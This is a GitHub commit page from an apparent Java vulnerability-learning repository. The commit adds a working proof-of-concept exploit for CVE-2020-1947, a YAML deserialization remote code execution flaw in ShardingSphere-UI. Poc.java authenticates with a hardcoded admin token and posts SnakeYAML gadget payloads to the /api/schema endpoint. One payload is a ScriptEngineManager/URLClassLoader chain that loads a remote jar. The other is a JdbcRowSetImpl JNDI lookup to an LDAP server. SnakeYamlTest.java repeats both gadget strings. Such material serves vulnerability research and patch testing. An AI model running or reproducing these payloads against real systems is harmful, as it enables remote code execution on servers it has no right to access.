Skip to content

Commit eadf7bb

Browse files
author
“threedr3am”
committed
1 parent 6d89b02 commit eadf7bb

File tree

7 files changed

+240
-1
lines changed

7 files changed

+240
-1
lines changed

ShardingSphere-UI/CVE-2020-1947/README.md

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
### *ShardingSphere-UI YAML反序列化*
2+
3+
CVE-2020-1947
4+
5+
#### 二进制运行
6+
- git clone https://github.com/apache/incubator-shardingsphere.git;
7+
- 运行 mvn clean install -Prelease;
8+
- 获取安装包 /sharding-distribution/shardingsphere-ui-distribution/target/apache-shardingsphere-incubating-${latest.release.version}-sharding-ui-bin.tar.gz;
9+
- 解压缩后运行bin/start.sh;
10+
- 访问http://localhost:8088/。
11+
12+
```
13+
server.port=8088
14+
15+
user.admin.username=admin
16+
user.admin.password=admin
17+
```

ShardingSphere-UI/CVE-2020-1947/pom.xml

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<project xmlns="http://maven.apache.org/POM/4.0.0"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5+
<parent>
6+
<artifactId>ShardingSphere-UI</artifactId>
7+
<groupId>com.xyh</groupId>
8+
<version>1.0-SNAPSHOT</version>
9+
</parent>
10+
<modelVersion>4.0.0</modelVersion>
11+
12+
<artifactId>CVE-2020-1947</artifactId>
13+
14+
<dependencies>
15+
<dependency>
16+
<groupId>com.xyh</groupId>
17+
<artifactId>common</artifactId>
18+
<version>1.0-SNAPSHOT</version>
19+
</dependency>
20+
</dependencies>
21+
</project>

ShardingSphere-UI/CVE-2020-1947/src/main/java/com/threedr3am/bug/shardingsphere/ui/Poc.java

Lines changed: 162 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,162 @@
1+
package com.threedr3am.bug.shardingsphere.ui;
2+
3+
import com.threedr3am.bug.common.server.LdapServer;
4+
import java.io.UnsupportedEncodingException;
5+
import java.util.Random;
6+
import java.util.concurrent.Executors;
7+
import org.apache.http.HttpEntity;
8+
import org.apache.http.client.methods.CloseableHttpResponse;
9+
import org.apache.http.client.methods.HttpPost;
10+
import org.apache.http.entity.StringEntity;
11+
import org.apache.http.impl.client.CloseableHttpClient;
12+
import org.apache.http.impl.client.HttpClientBuilder;
13+
import org.apache.http.impl.client.HttpClients;
14+
15+
16+
/**
17+
* @author threedr3am
18+
*/
19+
public class Poc {
20+
21+
public static void main(String[] args) throws UnsupportedEncodingException, InterruptedException {
22+
String target = "http://localhost:8088";
23+
String accessToken = "eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiIsImJhc2U2NCI6eyJlbmNvZGVUYWJsZSI6WzY1LDY2LDY3LDY4LDY5LDcwLDcxLDcyLDczLDc0LDc1LDc2LDc3LDc4LDc5LDgwLDgxLDgyLDgzLDg0LDg1LDg2LDg3LDg4LDg5LDkwLDk3LDk4LDk5LDEwMCwxMDEsMTAyLDEwMywxMDQsMTA1LDEwNiwxMDcsMTA4LDEwOSwxMTAsMTExLDExMiwxMTMsMTE0LDExNSwxMTYsMTE3LDExOCwxMTksMTIwLDEyMSwxMjIsNDgsNDksNTAsNTEsNTIsNTMsNTQsNTUsNTYsNTcsNDMsNDddLCJkZWNvZGVUYWJsZSI6Wy0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLC0xLDYyLC0xLDYyLC0xLDYzLDUyLDUzLDU0LDU1LDU2LDU3LDU4LDU5LDYwLDYxLC0xLC0xLC0xLC0xLC0xLC0xLC0xLDAsMSwyLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQsMTUsMTYsMTcsMTgsMTksMjAsMjEsMjIsMjMsMjQsMjUsLTEsLTEsLTEsLTEsNjMsLTEsMjYsMjcsMjgsMjksMzAsMzEsMzIsMzMsMzQsMzUsMzYsMzcsMzgsMzksNDAsNDEsNDIsNDMsNDQsNDUsNDYsNDcsNDgsNDksNTAsNTFdLCJkZWNvZGVTaXplIjozLCJlbmNvZGVTaXplIjo0LCJQQUQiOjYxLCJwYWQiOjYxLCJ1bmVuY29kZWRCbG9ja1NpemUiOjMsImVuY29kZWRCbG9ja1NpemUiOjQsImxpbmVMZW5ndGgiOjAsImNodW5rU2VwYXJhdG9yTGVuZ3RoIjoyfSwiZ3NvbiI6eyJjYWxscyI6eyJ0aHJlYWRMb2NhbEhhc2hDb2RlIjoxMzk4MDMyNzAxfSwidHlwZVRva2VuQ2FjaGUiOnsiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuRGF0ZVR5cGVBZGFwdGVyJDEiOnt9LCJjb20uZ29vZ2xlLmdzb24uTG9uZ1NlcmlhbGl6YXRpb25Qb2xpY3kiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzAiOnt9LCJkb3VibGUiOnt9LCJjb20uZ29vZ2xlLmdzb24uSW5zdGFuY2VDcmVhdG9yXHUwMDNjP1x1MDAzZSI6e30sImJvb2xlYW4iOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuQ29uc3RydWN0b3JDb25zdHJ1Y3RvciI6e30sImphdmEubGFuZy5yZWZsZWN0LlR5cGUiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5NYXBUeXBlQWRhcHRlckZhY3RvcnkiOnt9LCJpbnQiOnt9LCJqYXZhLmxhbmcuSW50ZWdlciI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLlNxbERhdGVUeXBlQWRhcHRlciQxIjp7fSwib3JnLmFwYWNoZS5jb21tb25zLmNvZGVjLmJpbmFyeS5CYXNlNjQiOnt9LCJqYXZhLmxhbmcuVGhyZWFkTG9jYWxcdTAwM2NqYXZhLnV0aWwuTWFwXHUwMDNjY29tLmdvb2dsZS5nc29uLnJlZmxlY3QuVHlwZVRva2VuXHUwMDNjP1x1MDAzZSwgY29tLmdvb2dsZS5nc29uLkdzb24kRnV0dXJlVHlwZUFkYXB0ZXJcdTAwM2M/XHUwMDNlXHUwMDNlXHUwMDNlIjp7fSwiamF2YS51dGlsLk1hcFx1MDAzY2phdmEubGFuZy5yZWZsZWN0LlR5cGUsIGNvbS5nb29nbGUuZ3Nvbi5JbnN0YW5jZUNyZWF0b3JcdTAwM2M/XHUwMDNlXHUwMDNlIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuQXJyYXlUeXBlQWRhcHRlciQxIjp7fSwiamF2YS5sYW5nLkNsYXNzXHUwMDNjP1x1MDAzZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5pbnRlcm5hbC5iaW5kLk9iamVjdFR5cGVBZGFwdGVyJDEiOnt9LCJqYXZhLnV0aWwuTGlzdFx1MDAzY2NvbS5nb29nbGUuZ3Nvbi5UeXBlQWRhcHRlckZhY3RvcnlcdTAwM2UiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzMiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzQiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5SZWZsZWN0aXZlVHlwZUFkYXB0ZXJGYWN0b3J5Ijp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuVHlwZUFkYXB0ZXJzJDM1Ijp7fSwiY29tLmdvb2dsZS5nc29uLkxvbmdTZXJpYWxpemF0aW9uUG9saWN5JDEiOnt9LCJqYXZhLmxhbmcuQnl0ZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5GaWVsZE5hbWluZ1N0cmF0ZWd5Ijp7fSwiamF2YS5sYW5nLkRvdWJsZSI6e30sImNvbS5nb29nbGUuZ3Nvbi5yZWZsZWN0LlR5cGVUb2tlblx1MDAzYz9cdTAwM2UiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMzIiOnt9LCJvcmcuYXBhY2hlLnNoYXJkaW5nc3BoZXJlLnVpLnNlY3VyaXR5LlVzZXJBdXRoZW50aWNhdGlvblNlcnZpY2UiOnt9LCJjb20uZ29vZ2xlLmdzb24uVHlwZUFkYXB0ZXJGYWN0b3J5Ijp7fSwiamF2YS51dGlsLkxpc3RcdTAwM2Njb20uZ29vZ2xlLmdzb24uRXhjbHVzaW9uU3RyYXRlZ3lcdTAwM2UiOnt9LCJjb20uZ29vZ2xlLmdzb24uVHlwZUFkYXB0ZXJcdTAwM2M/XHUwMDNlIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuSnNvbkFkYXB0ZXJBbm5vdGF0aW9uVHlwZUFkYXB0ZXJGYWN0b3J5Ijp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuVGltZVR5cGVBZGFwdGVyJDEiOnt9LCJjb20uZ29vZ2xlLmdzb24uaW50ZXJuYWwuYmluZC5UeXBlQWRhcHRlcnMkMjYiOnt9LCJieXRlIjp7fSwiYnl0ZVtdIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLnJlZmxlY3QuUmVmbGVjdGlvbkFjY2Vzc29yIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLmJpbmQuQ29sbGVjdGlvblR5cGVBZGFwdGVyRmFjdG9yeSI6e30sImphdmEubGFuZy5TdHJpbmciOnt9LCJjb20uZ29vZ2xlLmdzb24uRmllbGROYW1pbmdQb2xpY3kkMSI6e30sImNvbS5nb29nbGUuZ3Nvbi5Hc29uIjp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLnJlZmxlY3QuUHJlSmF2YTlSZWZsZWN0aW9uQWNjZXNzb3IiOnt9LCJqYXZhLnV0aWwuTWFwXHUwMDNjY29tLmdvb2dsZS5nc29uLnJlZmxlY3QuVHlwZVRva2VuXHUwMDNjP1x1MDAzZSwgY29tLmdvb2dsZS5nc29uLlR5cGVBZGFwdGVyXHUwMDNjP1x1MDAzZVx1MDAzZSI6e30sImphdmEubGFuZy5Cb29sZWFuIjp7fSwiY29tLmdvb2dsZS5nc29uLkV4Y2x1c2lvblN0cmF0ZWd5Ijp7fSwiY29tLmdvb2dsZS5nc29uLmludGVybmFsLkV4Y2x1ZGVyIjp7fX0sImNvbnN0cnVjdG9yQ29uc3RydWN0b3IiOnsiaW5zdGFuY2VDcmVhdG9ycyI6e30sImFjY2Vzc29yIjp7fX0sImpzb25BZGFwdGVyRmFjdG9yeSI6eyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319fSwiZmFjdG9yaWVzIjpbbnVsbCxudWxsLHsidmVyc2lvbiI6LTEuMCwibW9kaWZpZXJzIjoxMzYsInNlcmlhbGl6ZUlubmVyQ2xhc3NlcyI6dHJ1ZSwicmVxdWlyZUV4cG9zZSI6ZmFsc2UsInNlcmlhbGl6YXRpb25TdHJhdGVnaWVzIjpbXSwiZGVzZXJpYWxpemF0aW9uU3RyYXRlZ2llcyI6W119LG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLHsiY29uc3RydWN0b3JDb25zdHJ1Y3RvciI6eyJpbnN0YW5jZUNyZWF0b3JzIjp7fSwiYWNjZXNzb3IiOnt9fX0seyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319LCJjb21wbGV4TWFwS2V5U2VyaWFsaXphdGlvbiI6ZmFsc2V9LHsiY29uc3RydWN0b3JDb25zdHJ1Y3RvciI6eyJpbnN0YW5jZUNyZWF0b3JzIjp7fSwiYWNjZXNzb3IiOnt9fX0sbnVsbCx7ImNvbnN0cnVjdG9yQ29uc3RydWN0b3IiOnsiaW5zdGFuY2VDcmVhdG9ycyI6e30sImFjY2Vzc29yIjp7fX0sImZpZWxkTmFtaW5nUG9saWN5IjoiSURFTlRJVFkiLCJleGNsdWRlciI6eyJ2ZXJzaW9uIjotMS4wLCJtb2RpZmllcnMiOjEzNiwic2VyaWFsaXplSW5uZXJDbGFzc2VzIjp0cnVlLCJyZXF1aXJlRXhwb3NlIjpmYWxzZSwic2VyaWFsaXphdGlvblN0cmF0ZWdpZXMiOltdLCJkZXNlcmlhbGl6YXRpb25TdHJhdGVnaWVzIjpbXX0sImpzb25BZGFwdGVyRmFjdG9yeSI6eyJjb25zdHJ1Y3RvckNvbnN0cnVjdG9yIjp7Imluc3RhbmNlQ3JlYXRvcnMiOnt9LCJhY2Nlc3NvciI6e319fSwiYWNjZXNzb3IiOnt9fV0sImV4Y2x1ZGVyIjp7InZlcnNpb24iOi0xLjAsIm1vZGlmaWVycyI6MTM2LCJzZXJpYWxpemVJbm5lckNsYXNzZXMiOnRydWUsInJlcXVpcmVFeHBvc2UiOmZhbHNlLCJzZXJpYWxpemF0aW9uU3RyYXRlZ2llcyI6W10sImRlc2VyaWFsaXphdGlvblN0cmF0ZWdpZXMiOltdfSwiZmllbGROYW1pbmdTdHJhdGVneSI6IklERU5USVRZIiwiaW5zdGFuY2VDcmVhdG9ycyI6e30sInNlcmlhbGl6ZU51bGxzIjpmYWxzZSwiY29tcGxleE1hcEtleVNlcmlhbGl6YXRpb24iOmZhbHNlLCJnZW5lcmF0ZU5vbkV4ZWN1dGFibGVKc29uIjpmYWxzZSwiaHRtbFNhZmUiOnRydWUsInByZXR0eVByaW50aW5nIjpmYWxzZSwibGVuaWVudCI6ZmFsc2UsInNlcmlhbGl6ZVNwZWNpYWxGbG9hdGluZ1BvaW50VmFsdWVzIjpmYWxzZSwiZGF0ZVN0eWxlIjoyLCJ0aW1lU3R5bGUiOjIsImxvbmdTZXJpYWxpemF0aW9uUG9saWN5IjoiREVGQVVMVCIsImJ1aWxkZXJGYWN0b3JpZXMiOltdLCJidWlsZGVySGllcmFyY2h5RmFjdG9yaWVzIjpbXX19";
24+
String zookeeperURL = "127.0.0.1:2181";
25+
26+
initData(target, accessToken, zookeeperURL);
27+
28+
//todo payload-1:恶意jar包 payload,参考 common这个module 的CalcScriptEngineFactory类,以及其SPI注册文件META-INF/services/javax.script.ScriptEngineFactory
29+
String evilJar = "http://127.0.0.1:80/common-1.0-SNAPSHOT.jar";
30+
attack(target, accessToken, evilJar);
31+
32+
//todo payload-2:使用jndi注入 payload
33+
String evilLdapServer = "ldap://127.0.0.1:43658/Calc";
34+
// Executors.newSingleThreadExecutor().execute(() -> LdapServer.run());
35+
// Thread.sleep(3000L);
36+
// attack2(target, accessToken, evilLdapServer);
37+
}
38+
39+
private static void attack(String target, String accessToken, String evilJar)
40+
throws UnsupportedEncodingException {
41+
String payload;
42+
HttpPost httpPost;
43+
HttpEntity httpEntity;
44+
45+
//todo 添加scheme,反序列化RCE
46+
payload = "'111': !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ['" + evilJar + "']]]]";
47+
payload = "{\"name\":\"CVE-2020-1947(" + new Random().nextInt(10000) + ")\",\"ruleConfiguration\":\"name: 111\\nmasterDataSourceName: 222\\nloadBalanceAlgorithmType: 333\\nslaveDataSourceNames: [111,222]\",\"dataSourceConfiguration\":\"" + payload + "\"}";
48+
httpPost = new HttpPost(target + "/api/schema");
49+
httpPost.addHeader("Access-Token", accessToken);
50+
httpEntity = new StringEntity(payload, "application/json", "utf-8");
51+
httpPost.setEntity(httpEntity);
52+
try {
53+
HttpClientBuilder httpClientBuilder = HttpClients
54+
.custom()
55+
.disableCookieManagement()
56+
.disableAuthCaching()
57+
.disableRedirectHandling()
58+
;
59+
CloseableHttpClient httpClient = null;
60+
CloseableHttpResponse response = null;
61+
try {
62+
httpClient = httpClientBuilder.build();
63+
response = httpClient.execute(httpPost);
64+
} finally {
65+
response.close();
66+
httpClient.close();
67+
}
68+
} catch (Exception e) {
69+
e.printStackTrace();
70+
}
71+
}
72+
73+
private static void attack2(String target, String accessToken, String evilLdapServer)
74+
throws UnsupportedEncodingException {
75+
String payload;
76+
HttpPost httpPost;
77+
HttpEntity httpEntity;
78+
79+
//todo 添加scheme,反序列化RCE
80+
payload = "!!com.sun.rowset.JdbcRowSetImpl\\n dataSourceName: " + evilLdapServer + "\\n autoCommit: true";
81+
payload = "{\"name\":\"CVE-2020-1947(" + new Random().nextInt(10000) + ")\",\"ruleConfiguration\":\"name: 111\\nmasterDataSourceName: 222\\nloadBalanceAlgorithmType: 333\\nslaveDataSourceNames: [111,222]\",\"dataSourceConfiguration\":\"" + payload + "\"}";
82+
httpPost = new HttpPost(target + "/api/schema");
83+
httpPost.addHeader("Access-Token", accessToken);
84+
httpEntity = new StringEntity(payload, "application/json", "utf-8");
85+
httpPost.setEntity(httpEntity);
86+
try {
87+
HttpClientBuilder httpClientBuilder = HttpClients
88+
.custom()
89+
.disableCookieManagement()
90+
.disableAuthCaching()
91+
.disableRedirectHandling()
92+
;
93+
CloseableHttpClient httpClient = null;
94+
CloseableHttpResponse response = null;
95+
try {
96+
httpClient = httpClientBuilder.build();
97+
response = httpClient.execute(httpPost);
98+
} finally {
99+
response.close();
100+
httpClient.close();
101+
}
102+
} catch (Exception e) {
103+
e.printStackTrace();
104+
}
105+
}
106+
107+
private static void initData(String target, String accessToken, String zookeeperURL)
108+
throws UnsupportedEncodingException, InterruptedException {
109+
String name = String.valueOf(new Random().nextInt(10000));
110+
//todo 创建注册中心
111+
String payload = "{\"digest\":\"\",\"name\":\"CVE-2020-1947(" + name + ")\",\"namespace\":\"threedr3am\",\"orchestrationName\":\"threedr3am\",\"registryCenterType\":\"Zookeeper\",\"serverLists\":\"" + zookeeperURL + "\"}";
112+
HttpPost httpPost = new HttpPost(target + "/api/reg-center");
113+
httpPost.addHeader("Access-Token", accessToken);
114+
HttpEntity httpEntity = new StringEntity(payload, "application/json", "utf-8");
115+
httpPost.setEntity(httpEntity);
116+
try {
117+
HttpClientBuilder httpClientBuilder = HttpClients
118+
.custom()
119+
.disableAuthCaching()
120+
.disableCookieManagement()
121+
.disableRedirectHandling()
122+
;
123+
CloseableHttpClient httpClient = null;
124+
CloseableHttpResponse response = null;
125+
try {
126+
httpClient = httpClientBuilder.build();
127+
response = httpClient.execute(httpPost);
128+
} finally {
129+
response.close();
130+
httpClient.close();
131+
}
132+
} catch (Exception e) {
133+
e.printStackTrace();
134+
}
135+
136+
//todo 连接注册中心
137+
payload = "{\"name\":\"CVE-2020-1947(" + name + ")\"}";
138+
httpPost = new HttpPost(target + "/api/reg-center/connect");
139+
httpPost.addHeader("Access-Token", accessToken);
140+
httpEntity = new StringEntity(payload, "application/json", "utf-8");
141+
httpPost.setEntity(httpEntity);
142+
try {
143+
HttpClientBuilder httpClientBuilder = HttpClients
144+
.custom()
145+
.disableAuthCaching()
146+
.disableCookieManagement()
147+
.disableRedirectHandling()
148+
;
149+
CloseableHttpClient httpClient = null;
150+
CloseableHttpResponse response = null;
151+
try {
152+
httpClient = httpClientBuilder.build();
153+
response = httpClient.execute(httpPost);
154+
} finally {
155+
response.close();
156+
httpClient.close();
157+
}
158+
} catch (Exception e) {
159+
e.printStackTrace();
160+
}
161+
}
162+
}

ShardingSphere-UI/pom.xml

Lines changed: 19 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,19 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<project xmlns="http://maven.apache.org/POM/4.0.0"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5+
<parent>
6+
<artifactId>learn-java-bug</artifactId>
7+
<groupId>com.xyh</groupId>
8+
<version>1.0-SNAPSHOT</version>
9+
</parent>
10+
<modelVersion>4.0.0</modelVersion>
11+
12+
<artifactId>ShardingSphere-UI</artifactId>
13+
<packaging>pom</packaging>
14+
<modules>
15+
<module>CVE-2020-1947</module>
16+
</modules>
17+
18+
19+
</project>

pom.xml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -21,6 +21,7 @@
2121
<module>tomcat</module>
2222
<module>spring</module>
2323
<module>cas</module>
24+
<module>ShardingSphere-UI</module>
2425
</modules>
2526

2627
<name>learn-java-bug</name>

spring/spring-boot-actuator-bug/pom.xml

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -17,5 +17,11 @@
1717
<artifactId>snakeyaml</artifactId>
1818
<version>1.16</version>
1919
</dependency>
20+
21+
<dependency>
22+
<groupId>com.xyh</groupId>
23+
<artifactId>common</artifactId>
24+
<version>1.0-SNAPSHOT</version>
25+
</dependency>
2026
</dependencies>
2127
</project>

spring/spring-boot-actuator-bug/src/main/java/com/threedr3am/bug/spring/actuator/snakeyaml/SnakeYamlTest.java

Lines changed: 14 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,8 @@
11
package com.threedr3am.bug.spring.actuator.snakeyaml;
22

3+
import com.threedr3am.bug.common.server.LdapServer;
4+
import java.util.HashMap;
5+
import java.util.Map;
36
import org.yaml.snakeyaml.Yaml;
47

58
/**
@@ -10,16 +13,26 @@ public class SnakeYamlTest {
1013
public static void main(String[] args) {
1114
testNewInstance();
1215
testAttack();
16+
testAttack2();
1317
}
1418

1519
public static void testNewInstance() {
1620
Yaml yaml = new Yaml();
21+
Map<Object, Object> map = new HashMap<>();
22+
map.put("111", new A("xxx"));
23+
System.out.println(yaml.dump(map));;
1724
yaml.load("!!com.threedr3am.bug.spring.actuator.snakeyaml.A [\"threedr3am\"]");
1825
}
1926

2027
public static void testAttack() {
2128
Yaml yaml = new Yaml();
22-
yaml.load("!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://127.0.0.1:80/common-1.0-SNAPSHOT.jar\"]]]]");
29+
yaml.load("'111': !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ['http://127.0.0.1:80/common-1.0-SNAPSHOT.jar']]]]");
30+
}
31+
32+
public static void testAttack2() {
33+
new Thread(() -> LdapServer.run()).start();
34+
Yaml yaml = new Yaml();
35+
yaml.load("!!com.sun.rowset.JdbcRowSetImpl\n dataSourceName: ldap://127.0.0.1:43658/Calc\n autoCommit: true");
2336
}
2437

2538
}

0 commit comments

Comments
 (0)